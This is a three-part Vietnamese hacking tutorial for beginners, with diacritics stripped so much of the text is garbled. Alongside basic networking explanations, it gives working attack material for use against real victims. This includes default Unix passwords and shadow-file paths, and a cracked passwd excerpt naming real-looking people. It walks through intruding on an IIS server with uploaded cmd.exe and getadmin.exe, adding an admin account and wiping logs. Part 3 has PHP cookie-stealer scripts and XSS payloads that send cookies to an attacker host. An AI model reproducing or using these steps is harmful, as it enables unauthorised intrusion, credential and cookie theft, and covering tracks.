UDS - Tro Thanh Hacker

Trn trng cm n ngi cung cp cho UDS cun sch ny.
Nhng hiu bit c bn nht tr thnh Hacker - Phn 1

Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ? Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mt cch tng qut , hiu cc thut ng m nhng ngi rnh v mng hay s dng . Ring ti th cha tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt s kin thc c bn , mun chia s cho tt c cc bn , nhm cng cc bn hc hi . Ti s khng chu trch nhim nu cc bn dng n quy ph ngi khc . Cc bn c th copy hoc post trong cc trang Web khc nhng hy in tin tc gi di bi , tn trng bi vit ny cng chnh l tn trng ti v cng sc ca ti , ng thi cng tn trng chnh bn thn cc bn . Trong ny ti cng c chn thm mt s cch hack , crack v v d cn bn , cc bn c th ng dng th v nghin cu c n hiu thm , ri khi bt gp mt t m cc bn khng hiu th hy c bi ny bit , trong ny ti c s dng mt s ca bi vit m ti thy rt hay t trang Web ca HVA , v cc trang Web khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi l vn chnh . 1 . ) Ta cn nhng g bt u? C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l cc bn hy dng HH Window 9X , rI n cc ci khc mnh hn l Linux hoc Unix , dI y l nhng ci bn cn c : + Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .) + Mt ci trang Web tt ( HVA chng hn hi`hi` greenbiggrin.gif greenbiggrin.gif ) + Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l l Gozzila ) + Mt cng c chat tt ( mIRC ,Yahoo Mass ..) + Telnet ( hoc nhng ci tng t nh nmap ) + Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phI c mt cht kin thc v lp trnh ( C , C++ , Visual Basic , Pert ..) 2 . ) Th no l mt a ch IP ? _ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1 byte - > !P c kicks thc l 4byte, c chia thnh cc lp a ch. C 3 lp l A, B, v C. Nu lp A, ta s c th c 16 triu i ch, lp B c 65536 a ch. V d: lp B vi 132.25,chng ta c tt c cc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cc a ch lp A ll s hu ca cc cng ty hay ca t chc. Mt ISP thng s hu mt vi a ch lp B hoc C. V d: Nu a ch IP ca bn l 132.25.23.24 th bn c th xc nh ISP ca bn l ai. ( c IP l 132.25.x.) _ IP l t vit tt ca Internet Protocol, trn Internet th a ch IP ca mI ngi l duy nht v n s I din cho chnh ngI , a ch IP c s dng bi cc my tnh khc nhau nhn bit cc my tnh kt ni gia chng. y l l do ti sao bn li b IRC cm, v l cch ngi ta tm ra IP ca bn.
a ch IP c th d dng pht hin ra, ngi ta c th ly c qua cc cch sau : + bn lt qua mt trang web, IP ca bn b ghi li + trn IRC, bt k ai cng c th c IP ca bn + trn ICQ, mi ngi c th bit IP ca bn, thm ch bn chn ``do not show ip`` ngi ta vn ly c n + nu bn kt ni vi mt ai , h c th g ``systat n ``, v bit c ai ang kt ni n h + nu ai gi cho bn mt email vi mt on m java tm IP, h cng c th tm c IP ca bn ( Ti liu ca HVA ) 3 . ) Lm th no bit c a ch IP ca mnh ? Run nh lnh winipcfg . _ Trong Window : vo Start _ Trong mIRC : kt nI n my ch sau nh lnh /dns _ Thng qua mt s trang Web c hin th IP . 4 . ) IP Spoofing l g ? _ Mt s IP c mc ch xc nh mt thit b duy nht trn th gii. V vy trn mng mt my ch c th cho php mt thit b khc trao i d liu qua li m khng cn kim tra my ch. Tuy nhin c th thay i IP ca bn, ngha l bn c th gi mt thng tin gi n mt my khc m my s tin rng thng tin nhn c xut pht t mt my no (tt nhin l khng phi my ca bn). Bn c th vt qua my ch m khng cn phi c quyn iu khin my ch . iu tr ngi l ch nhng thng tin phn hi t my ch s c gi n thit b c IP m chng ta gi mo. V vy c th bn s khng c c s phn hi nhng thng tin m mnh mong mun. C l iu duy nht m spoof IP c hiu qu l khi bn cn vt qua firewall, trm account v cn du thng tin c nhn! ( Ti liu ca HVA ) 5 . ) Trojan / worm / virus / logicbomb l ci g ? _ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vo my ca ngI khc n cp nhng ti liu trn my gI v cho ch nhn ca n , Ci m n n cp c th l mt khu , accourt , hay cookie . tu theo mun ca ngI ci n . _ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit c ci ( hoc ly lan t my khc ) ln my ca nn nhn v thc hin nhng yu cu ca m , a s virut c s dng ph hoI d liu hoc ph hoI my tnh . _ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly lan khp bn trong mng .Cng ging nh Virut , n cng c th ph hoI d liu , hoc n c th ph hoI bn trong mng , nhiu khi cn lm down c mang . _ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mt a ch , lm ngp lt h thng , tt nghn ng truyn ( trn server ) hoc dng lm cng c khng b I phng ( bom Mail ) ;) .
6 . ) PGP l g ? _ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng s m ho cha kho cng cng bo v nhng h s Email v d liu , l dng m ho an ton cao s dng phn mm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khc . 7 . ) Proxy l g ? _Proxy cung cp cho ngi s dng truy xut internet vi nhng host n. Nhng proxy server phc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dung s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip n nhng yu cu t clientn server, cng nh p ng nhng yu cu ca server n client. V vy proxy server ging cu ni trung gian gia server v client . _ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vi dual host homed cn phi login vo host trc khi s dng dch v no trn internet. iu ny thng khng tin li, v mt s ngi tr nn tht vng khi h c cm gic thng qua firewall, vi proxy n gii quyt c vn ny. Tt nhin n cn c nhng giao thc mi nhng ni chung n cng kh tin li cho user. Bi v proxy cho php user truy xut nhng dch v trn internet t h thng c nhn ca h, v vy n khng cho php packet i trc tip gia h thng s dng v internet. ng i l ging tip thng qua dual homed host hoc thng qua s kt hp gia bastion host v screening rounter. ( Bi vit ca Z3RON3 ti liu ca HVA ) 8 . ) Unix l g ? _ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht , v thn thit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH ny khng th thiu i vI bn . N c s dng h tr cho lp trnh ngn ng C . 9 . ) Telnet l g ? _ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng ( port ) . MI my tnh hoc my ch ( server ) u c cng , sau y l mt s cng thng dng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 . 10 . ) Lm th no bit mnh Telnet n h thng Unix ? _ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt
ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .) By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn s thy c mt mt khu , bn hy th nhp Default Password th theo bng sau : Account-------------------------Default Password
Root----------------------------------------------- Root Sys------------------------------------------------ Sys / System / Bin Bin------------------------------------------------ -Sys / Bin Mountfsy------------------------------------------M ountfsys Nuuc----------------------------------------------- Anon Anon----------------------------------------------- Anon User----------------------------------------------- -User Games---------------------------------------------G ames Install-------------------------------------------- --Install Demo----------------------------------------------- Demo Guest---------------------------------------------- Guest
11 . ) shell account l ci g ? _ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI ( terminal ) m vI n bn c th nh lnh n mt my tnh ang chy Unix , Shell l chng trnh c nhim v dch nhng k t ca bn gi n rI a vo thc hin lnh ca chng trnh Unix . VI mt shell account chnh xc bn c th s dng c mt trm lm vic mnh hn nhiu so vI ci m bn c th tng tng n c . Bn c th ly c shell account min ph tI trang Web http://www.freeshell.com/ tuy nhin bn s khng s dng c telnet cho n khi bn tr tin cho n . 12 . ) Lm cch no bn c th crack Unix account passwords ? _ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI , cc bn c th crack c chng nu cc bn may mn , cn khng th cc bn c tham kho . _ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khch hng hoc mt ngI khch gh thm , nu may mn bn s ly c mt khu c ct du trong nhng h thng chun nh : /etc/passwd mi hng trong mt h s passwd c mt ti khon khc nhau , n ging nh hng ny :
userid:password:userid#:groupid#:GECOS field:home dir:shell trong : + userid = the user id name : tn ng nhp : c th l mt tn hoc mt s . + password : mt m . Dng lm g hn cc bn cng bit rI . + userid# : l mt s duy nht c thng bo cho ngI ng k khi h ng k mI ln u tin . + groupid# : tng t nh userid# , nhng n c dng cho nhng ngI ang trong nhm no ( nh nhm Hunter Buq ca HVA chng hn ) + GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y , s in thoi , a ch v.v. . y cng l ngun tt ta d dng crack mt mt khu . + home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm ( ging nh mc History trong IE vy ) + Shell : y l tn ca shell m n t ng bt u khi ta login . _ Hy ly file password , ly file text m ho v , sau bn dng chng trnh ``CrackerJack`` hoc ``John the Ripper`` crack . _ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may mn bn c th crack c v hu ht by gi h ct rt k , hy c tip bn s thy kh khn ch no . 13 . ) shadowed password l ci g ? _ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt mt khu , th ngI khc ch thy c trnh n ca n ( nh k hiu X hoc * ) . Ci ny thng bo cho bn bit l file passwd c ct gi ni khc , ni m mt ngI s dng bnh thng khng th n c . Khng l ta nh b tay , d nhin l I vI mt hacker th khng ri , ta khng n c trc tip file shadowed password th ta hy tm file sao lu ca n , l file Unshadowed . Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI ln lt nhng ng dn sau : CODE AIX 3 /etc/security/passwd ! or /tcb/auth/files/ / A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/ /
SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow maps/tables/whatever > System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20
Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo h thng tht s bn mun ly rI ln theo ng dn pha sau du /u tin . V cuI cng l nhng account passwd m ti tng crack c , c th by gi n ht hiu lc rI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh
bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc bn hy tm hiu thng tin c c t chng xem Ht phn 1 Tc gi : Anhdenday - HVAonline
Nhng hiu bit c bn nht tr thnh Hacker - Phn 2 [10/11/2004 3:11:00 PM]
Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(Tranmission Control Protocol) v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows c th chy nhiu chng trnh 1 lc, mi chng trnh ny c 1 cng ring dng truyn v nhn d liu. V d 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3 server, etc, nhng dch v ny u uc chy trn 1 IP address l 127.0.0.1, khi mt gi tin uc gi n lm th no my tnh ca chng ta phn bit c gi tin ny i vo dch v no WebServer hay FTP server hay SM! TP? Chnh v th Port xut hin. Mi dch v c 1 s
port mc nh, v d FTP c port mc nh l 21, web service c port mc nh l 80, POP3 l 110, SMTP l 25 vn vn.... Ngi qun tr mng c th thay i s port mc nh ny, nu bn ko bit s port trn mt my ch, bn ko th kt ni vo dch v c. Chc bn tng nghe ni n PORT MAPPING nhng c l cha bit n l g v chc nng th no. Port mapping thc ra n gin ch l qu trnh chuyn i s port mc nh ca mt dch v no n 1 s khc. V d Port mc nh ca WebServer l 80, nhng thnh thong c l bn vn thy http://www.xxx.com:8080/ , 8080 y chnh l s port ca host xxx nhng uc ngui qun tr ca host ny ``map`` t 80 thnh 8080. ( Ti liu ca HVA ) 15 . ) DNS l g ? _ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53, c ngha l nu bn mun kt ni vo my ch , bn phi kt ni n cng s 53. My ch chy DNS chuyn hostname bng cc ch ci thnh cc ch s tng ng v ngc li. V d: 127.0.0.1 -- > localhost v localhost--- > 127.0.0.1 . ( Ti liu ca HVA ) 16 . ) i iu v Wingate : _ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra. Th d: bn c th chia s 1 modem vi 2 hoc nhiu my . WinGate dng vi nhiu proxy khc nhau c th che giu bn . _ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hy telnet trn cng 23 trn my ch chy WinGate telnet proxy v bn s c du nhc WinGate > . Ti du nhc ny bn nh vo tn server, cng mt khong trng v cng bn mun kt ni vo. VD : CODE telnet wingate.net WinGate > victim.com 23
ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny IP trn my m victim chp c ca ta l IP ca my ch cha Wingate proxy . _ Lm sao tm Wingate ? + Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mt trang tm kim cable modem. Tm kim cable modems v nhiu ngi dng cable modems c WinGate h c th chia s ng truyn rng ca n cable modems cho nhng my khc trong cng mt nh . Hoc bn c th dng Port hay Domain scanners v scan Port 1080 . + tm IP ng (IP thay i mi ln user kt ni vo internet) ca WinGates bn c th
dng Domscan hoc cc chng trnh qut khc . Nu dng Domscan bn hy nhp khong IP bt k vo box u tin v s 23 vo box th 2 . Khi c kt qu , bn hy th ln lt telnet n cc a ch IP tm c ( hng dn trn ), nu n xut hin du Wingate > th bn tm ng my ang s dng Wingate rI . + Theo kinh nghim ca ti th bn hy down wingatescanner v m si , n c rt nhiu trn mng . 17 . ) i iu v Traceroute : _ Traceroute l mt chng trnh cho php bn xc nh c ng i ca cc gi packets t my bn n h thng ch trn mng Internet. _ bn hy xem VD sau : CODE C:\windows > tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops 1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms 2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms 3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms 4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms 5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms 7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms 8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms 9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
Ti cn bit ng i t my ti n mt host trn mng Internet c a ch ip l 203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi packets t my ti mun n c 203.94.12.54 phi i qua 13 hops(mc xch) trn mng. y l ng i ca cc gi packets . _ Bn hy xem VD tip theo : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets 1 isp.net (202.xy.34.12) 20ms 10ms 10ms 2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
+ Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng ny cn cho chng ta bit thm gi tr TTL<=30 v kch thc ca datagram l 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data). + Dng th 2 cho bit router u tin nhn c datagram l 202.xy.34.12, gi tr ca TTL khi gi n router ny l 1. Router ny s gi tr li cho chng trnh traceroute mt ICMP message error ``Time Exceeded``. Traceroute s gi tip mt datagram n h thng ch. + Dng th 3, xyz.com(202.xx.12.34) nhn c datagram c TTL=1(router th nht gim mt trc - TTL=2-1=1). Tuy nhin, xyz.com khng phi l mt router, n s gi tr li cho traceroute mt ICMP error message ``Port Unreachable``. Khi nhn c ICMP message ny, traceroute s bit c n c h thng ch xyz.com v kt thc nhim v ti y. + Trong trng hp router khng tr li sau 5 giy, traceroute s in ra mt du sao ``*``(khng bit) v tip tc gi datagram khc n host ch! _Ch : Trong windows: tracert hostname Trong unix: traceroute hostname ( Ti liu ca viethacker.net ) 18 . ) Ping v cch s dng : _ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn on mng. Tiu s ca t ``ping`` nh sau: Ping l ting ng vang ra khi 1 tu ngm mun bit c 1 vt th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s va vo vt th v ting vang li s l ``pong`` vy th tu ngm s bit l c g gn mnh. _Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn. Lnh Ping gi mt gi ICMP (Internet Control Message Protocol) n host, nu host ``pong`` li c ngha l host tn ti (hoc l c th vi ti oc). Ping cng c th gip chng ta bit c lung thi gian mt gi tin (data packet) i t my tnh ca mnh n 1 host no . _Ping tht d dng, ch cn m MS-DOS, v g ``ping a_ch_ip``, mc nh s ping 4 ln, nhng bn cng c th g CODE ``ping ip.address -t``
Cch ny s lm my ping mi. thay i kch thc ping lm nh sau: CODE ``ping -l (size) a_ch_ip ``
Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt bao lu gi tin ri xem xem sau bao lu gi tin quay tr li, cch ny xc nh c tc ca kt ni, v thi gian cn mt gi tin i v quay tr li v chia bn (gi l ``trip time``). Ping cng c th c dng lm chm i hoc v h thng bng lt ping. Windows 98 treo sau mt pht lt ping (B m ca kt ni b trn c qua nhiu kt ni, nn Windows quyt nh cho n i ngh mt cht). Mt cuc tn cng ping flood s chim rt nhiu bng thng ca bn, v bn phi c bng thng ln hn i phng ( tr khi i phng l mt my chy Windows 98 v bn c mt modem trung bnh, bng cch bn s h gc i phng sau xp x mt pht lt ping). Lt Ping khng hiu qu lm i vi nhng i phng mnh hn mt cht. tr khi bn c nhiu ng v bn kim sot mt s lng tng i cc my ch cng ping m tng bng thng ln hn i phng. Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mt cch lin tc, vi nhng khong ngt qung gia hai ln ping lin tip. Trong tt c cc h Unix hoc Linux, bn c th dng ping -f gy ra lt thc s. Thc t l phi ping -f nu bn dng mt bn tng thch POSIX (POSIX - Portable Operating System Interface da trn uniX), nu khng n s khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng mt h iu hnh m n t cho n l Unix hay Linux, n s c tham s -f. ( Ti liu ca HVA v viethacker.net ) 19 . ) K thut xm nhp Window NT t mng Internet : _ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu v hack , by gi ti s by li cho cc bn . bn s cn phI c mt s thI gian thc hin c n v n tuy d nhng kh . Ta s bt u : _ u tin bn cn tm mt server chy IIS : _ Tip n bn vo DOS v nh ` FTP `. VD : c:\Ftp http://www.dodgyinc.com/ ( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha , nu bn no c trang no khc th hy post ln cho mI ngI cng lm nh ) Nu connect thnh cng , bn s thy mt s dng tng t nh th ny : CODE Connected to http://www.dodgyinc.com./ 220 Vdodgy Microsoft FTP Service (Version 3.0). User (www.dodgyinc.com:(none)):
Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bit tn Netbios ca my tnh l Vdodgy . T iu ny bn c th suy din ra tn m c s dng cho NT cho php ta c th khai thc , mc nh m dch v FTP gn cho n nu n cha i tn s l IUSR_VDODGY . Hy nh ly v n s c ch cho ta . Nhp `ànonymous trong user n s xut hin dng sau :
CODE 331 Anonymous access allowed, send identity (e-mail name) as password. Password:
By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nh vo passwd l anonymous . Nu n sai , bn hy log in lI thit b FTP , bn hy nh l khi ta quay lI ln ny th khng s dng cch mo danh na ( anonymous ) m s dng `Guest , th li passwd vi guest xem th no . By gi bn hy nh lnh trong DOS : CODE Cd /c
V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bn hy nhanh chng tm th mc `cgi-bin` . Nu nh bn may mn , bn s tm c d dng v thng thng h thng qun l t `cgi-bin` vo ni m ta va xm nhp cho cc ngI qun l h d dng iu khin mng hn . th mc cgi-bin c th cha cc chng trnh m bn c th li dng n chy t trnh duyt Web ca bn . Ta hy bt u quy no greenbiggrin.gif greenbiggrin.gif . _ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary ( c th cc bn khng cn dng lnh ny ) , sau bn dnh tip lnh put cmd.exe . Tip theo l bn cn c file hack ci vo th mc ny , hy tm trn mng ly 2 file quan trng nht l `getadmin.exe` v `gasys.dll` . Download chng xung , mt khi bn c n hy ci vo trong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca s DOS . By gi bn hy nh a ch sau ln trnh duyt ca bn : http://www.dodgyinc.com/cgi-bin/getadmin.exe? IUSR_VDODGY Sau vi giy bn s c c cu tr li nh dI y : CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Congratulations , now account IUSR_VDODGY have administrator rights!
Th l bn mo danh admin xm nhp h thng , vic cn thit by gi l bn hy t to cho mnh mt account , hy nh dng sau trn IE : http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add
dng lnh trn s to cho bn mt account login vi user : anhdenday v passwd : toilahackerBy gi bn hy l cho user ny c account ca admin , bn ch cn nh ln IE lnh : http://www.dodgyinc.com/cgi-bin/getadmin.exe? anhdenday Vy l xong ri , bn hy disconnect v n start menu - > find ri search computer `www.dodgyinc.com`. Khi tm thy , bn vo explore , explore NT s m ra bn hay nhp user v passwd m n ( ca ti l user : anhdenday v passwd : toilahacker ) . C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt bn hy vo `Winnt\system32\logfiles` m file log rI xo nhng thng tin lin quan n bn , rI save chng . Nu bn mun ly mt thng bo g v vic chia s s xm nhp th bn hy thay i ngy thng trn my tnh vI URL sau : http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20 date%2030/04/03 xong rI bn hy xo file `getadmin.exe`, v `gasys.dll` t `cgi-bin` . Mc ch khi ta xm nhp h thng ny l chm pass ca admin ln sau xm nhp mt cch hp l , do bn hy tm file SAM ( cha pass ca admin v member ) trong h thng rI dng chng trnh l0pht crack crack pass ( Hng dn v cch s dng l0pht crack v 3.02 ti post ln ri ,cc bn hy t nghin cu nh ) . y l link : http://vnhacker.org/forum/?act=ST&f=6&t=11566 &s= Khi crack xong cc bn c user v pass ca admin rI , by gi hy xo account ca user ( ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h thng l tu thch , nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm . Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti my m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian hn . phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt Web site , v lm th no hack mt trang web n gin nht .v.v Ht phn 2
Tc gi: Anhdenday - HVAOnline.net
Nhng hiu bit c bn nht tr thnh Hacker - Phn 3 [12/7/2004 10:33:00 AM]
20.) Cookie l g ? Cookie l nhng phn d liu nh c cu trc c chia s gia web site v browser ca ngi dng. cookies c lu tr di nhng file d liu nh dng text (size
di 4k). Chng c cc site to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm site v nhng vng m h i qua trong site. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quen...Cookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh, ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin v ngi dng c lu tr trong cookie. nhng ln truy cp sau n site , web site c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1 forum...) m ngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng tin khc. Vn t ra l c nhiu site qun l vic dng li cc thng tin lu trong cookie ko chnh xc, kim tra ko y hoc m ho cc thng tin trong cookie cn s h gip cho hacker khai thc vt qua cnh ca ng nhp, ot quyn iu khin site . _ Cookies thng c cc thnh phn sau : + Tn: do ngi lp trnh web site chn + Domain: l tn min t server m cookie c to v gi i + ng dn: thng tin v ng dn web site m bn ang xem + Ngy ht hn: l thi im m cookie ht hiu lc . + Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho trong qu trnh truyn gia server v browser. + Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v sau cc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong 4k. ( Ti liu ca Viethacker.net ) 21 . ) K thut ly cp cookie ca nn nhn : _ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad : CODE <?php define (``LINE``, ``\r\n``); define (``HTML_LINE``, `` ``); function getvars($arr, $title) { $res = ````; $len = count($arr); if ($len > 0) { if (strlen($title) > 0) { print(``[--------$title--------]`` . HTML_LINE);
$res .= ``[--------$title--------]`` . LINE; } foreach ($arr as $key = > $value) { print(``[$key]`` . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= ``[$key]`` . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date(``Y-m-d H:i:s``); // init $myData = ``[-----$now-----]`` . LINE; // get $myData .= getvars($HTTP_GET_VARS, ````); // file $file = $REMOTE_ADDR . ``.txt``; $mode = ``r+``; if (!file_exists($file)) $mode = ``w+``; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?>
hoc CODE <?php if ($contents && $header){ mail(``victim@yahoo.com`` , ``from mail script``,$contents,$header) or die(`couldnt email it`); sleep(2); ?> <script language=javascript >
<?php } else { echo ``nope``; }
(Bn hy sa ci victim@yahoo.com thnh a ch Mail ca bn ) . Bn hy save ci notepad ny vi tn < tn tu cc bn > .php ( Nh l phi c .php ) ri upload ln mt host no c h tr PHP , trong VD ca ti l abc.php .( i vi cc bn tng lm Web chc s rt d phI khng ? ) . on m ny s c nhim v n cp thng tin (v c khi c c cookie ) ca nn nhn khi h m d liu c cha on m ny rI t ng save thng tin thnh file < ip ca nn nhn > .txt . _ Cn mt cch na ly cookie c s dng trn cc forum b li nhng cha fix , khi post bi bn chi cn thm on m sau vo bi ca mnh : CODE document.write(` `)
vi host_php : l a ch bn upload file n cp cookie ln . v abc.php l file VD ca ti . _ V d : khi p dng trong tag img, ta dng nh sau: CODE `)\">
hoc: [CODE img]javascript: Document.write(`&#x3cimg src=http://host_php/docs.php?docs=`+escape(document .cookie)+`&#x3e`)\">
_ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch vo google.com tm nhng forum b li ny bng t kho ``Powered by .. forum vi nhng forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nu cc bn may mn cc bn c th tm thy nhng forum cha fix li ny m thc hnh , ai tm c th chia s vi mi ngi nh . _ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm . 22 . ) Cch ngt mt khu bo v Website : _ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trang Web khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y chnh l khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt nhm ngi no ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi ta click vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cng trong th mc bo v trang Web . Ti sao phi dng du chm
trc trong tn file `.htaccess`? Cc file c tn bt u l mt du chm `.` s c cc web servers xem nh l cc file cu hnh. Cc file ny s b n i (hidden) khi bn xem qua th mc c bo v bng file .htaccess .Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton m bn mun xm nhp . Mt ci qun l mt khu v user name , mt ci qun l cng vic m ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m ra . Bn hy nhn VD sau : CODE Graham:F#.DG*m38d%RF Webmaster:GJA54j.3g9#$@f
